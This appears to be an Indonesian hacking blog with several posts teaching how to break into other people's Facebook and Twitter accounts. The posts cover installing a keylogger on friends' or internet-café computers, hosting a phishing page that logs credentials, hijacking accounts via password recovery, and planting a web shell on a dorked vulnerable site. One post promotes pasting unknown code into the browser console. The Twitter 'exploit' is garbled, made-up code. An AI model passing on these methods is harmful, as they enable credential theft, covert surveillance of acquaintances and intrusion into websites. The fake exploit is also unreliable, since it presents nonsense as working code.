Defender Black Red AnonSec

Kamis, 20 Februari 2014


Lagi buka Facebook, eh ternyata pada rame bahas AnonySocial. Ya, AnonySocial adalah situs jejaring baru. Fiturnya memang tidak jauh berbeda dari Facebook. Ada fitur membuat halaman, fitur chat, like status dan lain-lain. Bahasa defaultnya adalah bahasa Brazil [Portugis], kemungkinan dibuat oleh orang Brazil. Brazil kan sarangnya Anonymous. Hehehe.
Tapi saya sendiri belum tahu siapa pembuat situs jejaring sosial tersebut. Maybe, keep anonymous. :3
Oke, ini screenshootnya :

Yang ingin mendaftar, silahkan menuju link berikut :
http://anonysocial.com/

Saat pertama kali diakses, bahasa situsnya adalah Bahasa Brazil. Namun anda bisa mengubahnya ke bahasa Amerika [Inggris]. Letak ganti bahasa ada di pojok kiri bawah.
Add akun saya ya bro :
HarukaHentz A.K.A Alayer48

Sekian dan terimakasih.

Sumber : AnonSec

Senin, 06 Januari 2014

Hey All Fans OH YES ITS FREE

TODAY I WILL SHOW YOU HOW TO GET MORE THAN 5000 FOLLOW On FACEBOOK IN JUST IN A FEW MINUTES JUST FOLLOW THE STEPS ON THE VIDEO

Firefox 
1. Copy the code on the site :http://adf.ly/b3xGS
(For easy copy press CTRL A)
2. Press CTRL SHIFT K and then paste the code Past.
3. Press Enter and wait a little and then refresh the page.

Google chrome 
1. Copy the code on the site : http://adf.ly/b3yfK
(For easy copy press CTRL A)
2. Press Right Click, Then Click inspect element, Then Click Console and then paste the code Past.
3. Press Enter and wait a little and then refresh the page.

FOLLOW THIS LIST ON FACEBOOK

Rabu, 04 Desember 2013



Cara Hack Akun Facebook Desember 2013 100% Berhasil - Cyber Attack akan bagi bagi trik Ngehack Akun FB Orang lain . Trik ini adalah nyata buka tipuan gan. saya sudah pernah mencoba trik ini dan 100 persen berhasil diambil password facebook orang lain dan teman saya. Cara kerja Tool keylogger ini adalah Jika Teman atau orang lain mengetikan sesuatu di komputer atau di laptop akan terbaca atau akan dibentuk dalam tulisan oleh software keylogger ini.. Jika Anda tidak sabar lagi ingin mencobanya silahkan dilihat..
Sebelum melakukan trik yang saya berikan ini Anda harus lakukan 3 cara dibawah ini.
Berdoalah Terlebih dahulu ( agar diperjalanan tidak ada hal hal yang diinginkan )
Mintalah Doa Restu orang tua
Langkah demi langkah harus hati hati ,jangan sampai kepleset soalnya sering hujan, jadinya licin deh.
inilah yang ditunggu tunggu Cara Hack Akun Facebook Orang Lain Desember 2013 100% Berhasil
Untuk Cek Berhasil atau tidak dengan Laptop/Komputer sendiri
1. Downloadlah software/Tool untuk Hack Akun Facebook 2013 disini

2. Extrack terlebih dahulu , Klik kanan -> Extrack Here
3. Buka Folder dan Instal Software yang sudah anda download tadi dan masukkan password anda(terserah dan hafalkan) jika tidak diberi password juga gak masalah ..dan install selesai
4. Buka Facebook.com dan login menggunakan Email dan Password fb anda
5. Setelah Anda Login tadi. Kemudian buka ke folder Keylogger Douglas dan Buka ReadInfo dan masukkan password yang anda gunakan untuk install software ini tadi
6. dan akan terlihat Email dan password tadi yang anda ketikan di keyboard..

Untuk Dilakukan di warnet Terdekat 
1. Downloadlah software/Tool untuk Hack Akun Facebook 2013 disini
2. Copy software ke flashdisk anda dan Pergilah ke Warnet Terdekat
3. Copy Software tadi ke pc warnet . dan Extrack terlebih dahulu , Klik kanan -> Extrack Here
4. Buka Folder dan Instal Software yang sudah anda download tadi dan masukkan password anda(terserah dan hafalkan) jika tidak diberi password juga gak masalah ..dan install selesai
5. Keluar dari warnet dan pulanglah sebentar (ini Menunggu GAN )
6. Kembali dan masuklah ke pc warnet yang anda masuki tadi . dan Buka folder tadi kemudian buka ReadInfo kemudian masukkan password anda yang anda gunakan saat install tadi..dan akan terlihat apa yang diketikkan orang yang nongkrong di depan pc warnet yang anda masuki tadi

Untuk Dilakukan di Laptop/Komputer Teman Anda
1. Download software dulu.dan copy ke flashdisk anda
2. Pergilah ke teman anda yang ingin dijadikan korban.. dan pastikan teman anda lagi ashik internetan atau facebookan
3. Suruh teman anda beli makanan apa terserah.. atau anda akal sendiri agar teman anda bisa keluar sebentar
4. Setelah Anda Teman anda keluar sebentar dan anda telah kehabisan akal..saatnya copy softwarenya ,setelah itu install seperti biasa kayak langkah yang diatas sudah saya jelaskan.. sembunyikan foldernya
5. kemudian keluar dari facebook teman anda dan anda masuk ke akun fb anda sendiri dan keluar dari akun fb anda..
6. dan berbicalah kepada teman anda saat teman anda pulang..hay bro ( bahasa anda sendiri ) gue tadi habis coba buka facebook gue masih bisa dibuka nggak.. suruh teman anda buka fb anda dan biarkan teman anda beraktifitas dengan facebook
7. dan akali lagi untuk keluar rumah atau main sebentar dan saatnya anda lakukan untuk Mengetahui email dan password teman anda.dengan buka folder tadi-> buka READINFO->masukkan password yang anda gunakan untuk install tadi
8. Carilah yang email dan password teman anda disitu pasti ada

Untuk Dirumah Anda Sendiri Korban jadi Tamu
1. Pastikan sudah download
2. Pastikan sudah anda install sebelumnya
3. Ajak teman kerumah anda main game di laptoplah apalah terserah. Suruh teman anda membuka akun facebooknya..
4. dan teman anda sudah keluar dari akun fbnya..
5. Saatnya anda lakukan untuk mengetahui email dan password teman anda

NB: Semua Langkah diatas harus Rahasia dan tidak diketahui orang lain .Jika dilakukan hati hati pasti akan berhasil

Sekian Cara Hack Akun Facebook Orang Lain Desember 2013 100% Berhasil semoga bermanfaat.
Jika ada yang bingung cara diatas silahkan berkomentar

Hack Akun FB Lewat PC/HP



Assalamualaikum Wr.wb
Mungkin Kalian Pernah ingin Hack Akun tapi gk ribet
ok ini caranya:
1.buka situs ny Disini
2.lalu daftar dulu.caranya klik registrasi
kenapa harus daftar?
Gunanya untuk melihat password korban
tenang aja cuman butuh email buat daftar ny
3.buka fb kmu dan masuk profile korban
4.copy url ny
kalau anda dri hp
ubah dri m.facebook/0.facebook
menjadi www.facebook
5.lalu masukan url korban di bawah tulisan url of victim(kotak area tulisan)
6.lalu tekan hack acount
7.tunggu proses ny
8.Jika sudah tekan save password
9.liat deh email&password ny

NB:kalo lewat hp sebaik nya pakai ucweb

Gunakanlah dgn sebijak-bijak ny

Follow blog ini y

APLIKASI UNTUK MELIHAT PASSWORD FB ORANG  DENGAN HP


lansung saja, aplikasi ini memang sangat mudah untuk digunakan, tinggal klik ya :Download
langsung muncul deskopnya, gak percyaaa :Download
download aja DISINI:Download

Sekian dari ane, semoga bermanfaat bagii kalian.
warning : aplikasi ini jangan di salah gunakan

Selasa, 19 November 2013


Petama-tama cari dulu Web Vuln (Vulnerabillity)
Dengan Dork : intext:Powered by MediaCreativeCenter
Cek Web Vuln dengan /post.php
Contoh : http://patum.go.th/post.php
jika Vuln maka hasilnya akan seperti ini


Lalu isi Data nya terserah anda, jangan lupa masukan shell agan.
Dan jika berhasil maka akan seperti ini.



Ketikan CTRL+U untuk melihat page source.
Lalu Cari /imgboard

Nah itu sudah ketemu, lalu klik link nya.
Maka hasilnya begini.

Mudah kan??
silahkan dicoba.



Sabtu, 16 November 2013


CARA KERJA HACKING AKUN TWITTER

Twitter memiliki dua database (satu untuk pria dan satu untuk pengguna perempuan) di mana mereka menyimpan semua informasi dari pengguna mereka, jika Anda ingat email yang Anda gunakan untuk login namun lupa sandi, Anda dapat menggunakan 'Lupa kata sandi Anda?' pilihan, namun jika seperti saya Anda tidak memiliki informasi yang tidak mungkin untuk memulihkan hukum account tersebut.

Jika Anda tahu apa-apa tentang website pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak langsung dengan database untuk mengirim permintaan untuk mengambil informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah jika Anda bertanya 'database untuk informasi yang login dengan' kode 'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali informasi tersebut.

Jadi semua saya harus mencari tahu adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa minggu menulis dan menguji kode saya datang dengan orang yang tepat untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar Twitter menggunakan sesuatu yang mirip dengan layanan email untuk menghubungi database mereka.

Tapi seperti biasa, semuanya tidak semudah tampaknya. Untuk alasan keamanan database diprogram untuk memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke email Anda saat membuat account Anda atau mengubah password Anda) , untungnya bagi kami Twitter begitu buruk diprogram mereka juga memungkinkan Anda untuk menggunakan teman / pengikut account untuk memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa / Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika terkait teman / email pengikut terkait dengan account 'korban'), dengan kata lain, jika orang yang Anda ingin mendapatkan informasi login dari yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan membingungkan database ke dalam berpikir kita memeriksa apakah Anda berdua saling mengikuti satu sama lain daripada tindakan yang benar reseting password mereka dan membuat mereka kirim pada kami) dan mendapatkan login email dan password yang dikirim ke Anda ... tapi korban harus mengikuti Anda dan Anda mereka

CARA MELAKUKANNYA

1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?

Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini
Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.


2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .

Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.

3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:

Untuk Lebih Jelas nya Silahkan di Klik untuk Di Perbesar

1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.

Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.

4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.

Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:
1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.

5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.

Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:

Untuk Lebih Jelas nya Silahkan di Klik untuk Di Perbesar



THE EXPLOIT CODE

twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0]; 

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' { 
print Success, We have sent you an email with the Login email and Password of that Username. 
else { 
// print "We're sorry, your follower does not appear to be in our database." 

$passwordfromdb = $row[0]; 
$find userID = (%follower_list) 
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%> 
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%) 
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%) 
$follower_database_exploit = '%request_forgot_pass_info' 
$email_to = %%%@subject_email 

session_start(); 
session_reset_pass("session"); 
$email_address = $_POST['email_address']; 
if (!isset($_POST['email_address'])) { 

elseif (empty($email_address)) { 
echo $empty_fields_message; 
function decrypt userID password() { 
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; 
srand((double)microtime()*1000000); 
$i = 0; 
while ($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } mail($email_address, $subject, $message, "Twitter Password Reset Confirmation } /end$


Semoga Bermanfaat ^_^

Oke, kali ini saya (Sanusi R) ada waktu sedikit untuk sekedar memposting yang baru diblog.
Sedikit Berbagi, semoga saja banyak yang senang untuk postingan kali ini, dan yang galau bisa tergugah dengan postingan ini. jiahahahha :D
Saya posting ini karena banyak yang bertanya soal cara Hack Twitter, sebenarnya memang sama dengan Hack Facebook, scriptnya saja yang diganti dengan halaman login twitter. Oke langsung saja, daripada tulis panjang-panjang nanti membingungkan pembaca. Simak baik-baik dibawah ini:



  1. Harus punya hostingan dulu. Daftar saja di http://idhostinger.com 
  2. Download file Hack Twitter 2013 
  3. Masukkan file diatas yang telah didownload dihostingan. Di file manager 3 tepatnya dipublic_html.
  4. Setelah berhasil diupload, tinggal cek halaman palsu yang dibuat tadi. Coba login dihalaman tersebut, lalu cek di file emailpassword.txt 
  5. Halaman fake loginnya seperti ini contohnya. Klik Disini! 
  6. Terakhir tinggal bagaimana caranya menjaring target untuk login dihalaman tersebut.
Bagaimana? mudah kan? :)
Oke, sekian postingan pembelajaran tentang Cara Hack Twitter 2013.  Untuk yang belum jelas atau kurang paham, bisa komentar :)

Kamis, 10 Oktober 2013

Selamat malam, kali ini admin bakal share 'Cara hack Facebook 2013' Tentunya di dalam hal Hacking, Mungkin kalian udah pernah liat tutorial fb yg lain mungkin yg paling ampuhh sekalipun ;) tapi admin akan share ini yg memakai cara terampuhh! 5menit langsung kelar ;) di dalam tutorial ini kalian hanya membutuhkan EMAIL KORBAN. Mudah bukan ? Tetapi saya peringatkan jangan di gunakan sembarangan!! di sini kita hanya belajar bagaimana cara meretas/menghack facebook ;) namun sekali lagi aku tegaskan JANGAN DI SALAH GUNAKAN!

Yuk masuk ke tutorialnya :

Petama ,Kita masuk ke halaman login fb biasa, terus klik 'Lupa kata sandi Anda?' biasanya Text ini berada di bawah Kolom isi Password.  nah lalu kali ini kalian akan menentukan siapa yg mau di Bobol fbnya, kali ini sobat hanya membutuhkan email si korban yaa?. lalu masukan email korban aja, liat Pict di bawah ini
Kedua, setelah kalian klik cari di gambar atas tadi kalian akan menemukan halaman sebagai berikut, pasti anda telah mengerti si Korban tadi Facebook nya apa, dan di sini kita langsung klik 'Ini Akun Saya'
Ketiga ,kita mulai dari sini, setelah kalian klik 'Ini Akun Saya' di Pict sebelumnya, kalian akan menemui Halaman berikut, dan tanpa ragu-ragu kalian langsung klik 'Tidak punya akses ke sini lagi?' gimana 
mudahkan ? lanjuttt
Ke empat ,Atur email Baru anda ;) (Mulai senyum) atur email yg anggap kalian aman, dan tidak di ketahui orang-orang terdekat maupun . setelah kalian isi dua kolom lalu klik 'Lanjutkan'
Kelima ,naaah sudah berhasil masuk ke FB si korban tadi ;) udah mulai seneng ni hati XD xixixi, dan berikut atur Jawaban pertanyaan anda demi keamanan akun anda ;)
Ke Enam ,Taraaaaa berhasil!! Ganti kata sandi sesuai yg anda inginkan pastinya yg aman ;) okeee


Untuk Yang Lebih Simple
Click here : Facebook Hack 2013

*Note : Jangan di salah gunakan! blogger ini tidak menanggung kerusakan pada Facebook dg mengatasnamakan blog ini. jadi mohon jangan di salah gunakan!! BLOGGER INI TIDAK MENANGGUNG KESALAH USER.







Minggu, 06 Oktober 2013


Oke, kali ini saya (Sanusi R) ada waktu sedikit untuk sekedar memposting yang baru diblog.
Sedikit Berbagi, semoga saja banyak yang senang untuk postingan kali ini, dan yang galau bisa tergugah dengan postingan ini. jiahahahha :D
Saya posting ini karena banyak yang bertanya soal cara Hack Twitter, sebenarnya memang sama dengan Hack Facebook, scriptnya saja yang diganti dengan halaman login twitter. Oke langsung saja, daripada tulis panjang-panjang nanti membingungkan pembaca.

Simak baik-baik dibawah ini:



Harus punya hostingan dulu. Daftar saja di http://idhostinger.com
Download file Hack Twitter 2013
Masukkan file diatas yang telah didownload dihostingan. Di file manager 3 tepatnya di public_html.
Setelah berhasil diupload, tinggal cek halaman palsu yang dibuat tadi. Coba login dihalaman tersebut, lalu cek di file emailpassword.txt 
Halaman fake loginnya seperti ini contohnya. Klik Disini!
Terakhir tinggal bagaimana caranya menjaring target untuk login dihalaman tersebut.
Bagaimana? mudah kan? :)

Oke, sekian postingan pembelajaran tentang Cara Hack Twitter 2013.  Untuk yang belum jelas atau kurang paham, bisa komentar :)